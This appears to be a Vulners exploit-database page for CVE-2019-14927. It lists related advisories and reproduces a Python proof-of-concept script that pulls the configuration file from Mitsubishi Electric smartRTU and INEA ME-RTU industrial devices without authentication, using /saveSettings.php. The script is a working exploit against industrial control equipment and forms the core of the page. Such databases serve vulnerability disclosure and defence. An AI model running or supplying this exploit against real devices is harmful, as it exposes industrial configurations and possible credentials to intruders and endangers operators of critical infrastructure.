| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| CVE-2019-14927 | 29 Jan 202410:41 | – | circl | |
| Mitsubishi Electric smartRTU and Inea ME-RTU Information Disclosure Vulnerability | 4 Nov 201900:00 | – | cnvd | |
| CVE-2019-14927 | 28 Oct 201912:08 | – | cve | |
| CVE-2019-14927 | 28 Oct 201912:08 | – | cvelist | |
| Mitsubishi Electric smartRTU INEA ME-RTU - Unauthenticated Configuration Download | 12 Aug 201900:00 | – | exploitpack | |
| Mitsubishi Electric Europe B.V. smartRTU and INEA ME-RTU | 9 Sep 202100:00 | – | ics | |
| CVE-2019-14927 | 28 Oct 201913:15 | – | nvd | |
| CVE-2019-14927 | 28 Oct 201913:15 | – | osv | |
| Design/Logic Flaw | 28 Oct 201913:15 | – | prion | |
| PT-2019-13869 · Mitsubishi · Me-Rtu | 28 Oct 201900:00 | – | ptsecurity |
#!/usr/bin/python
# Exploit Title: Mitsubishi Electric smartRTU & INEA ME-RTU Unauthenticated Configuration Download
# Date: 29 June 2019
# Exploit Author: (@xerubus | mogozobo.com)
# Vendor Homepage: https://eu3a.mitsubishielectric.com/fa/en/products/cnt/plcccl/items/smartRTU/local
# Vendor Homepage: http://www.inea.si/en/telemetrija-in-m2m-produkti/mertu-en/
# Firmware Version: Misubishi Electric 2.02 & INEA 3.0
# CVE-ID: CVE-2019-14927
# Full write-up: https://www.mogozobo.com/?p=3593
import sys, os, requests, socket
os.system('clear')
print("""\
_ _
___ (~ )( ~)
/ \_\ \/ /
| D_ ]\ \/ -= Conf_Me-smartRTU by @xerubus =-
| D _]/\ \ -= We all have something to hide =-
\___/ / /\ \\
(_ )( _)
@Xerubus
""")
host = raw_input("Enter RTU IP address: ")
php_page = '/saveSettings.php'
url = "http://{}{}".format(host, php_page)
print "[+] Attempting to download smartRTU configuration file"
r = requests.get(url)
if r.status_code == 200:
print "[+] Successfully obtained smartRTU configuration file.. saving to smartRTU_conf.xml\n"
with open('smartRTU_conf.xml', 'w') as f:
f.write(r.content)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation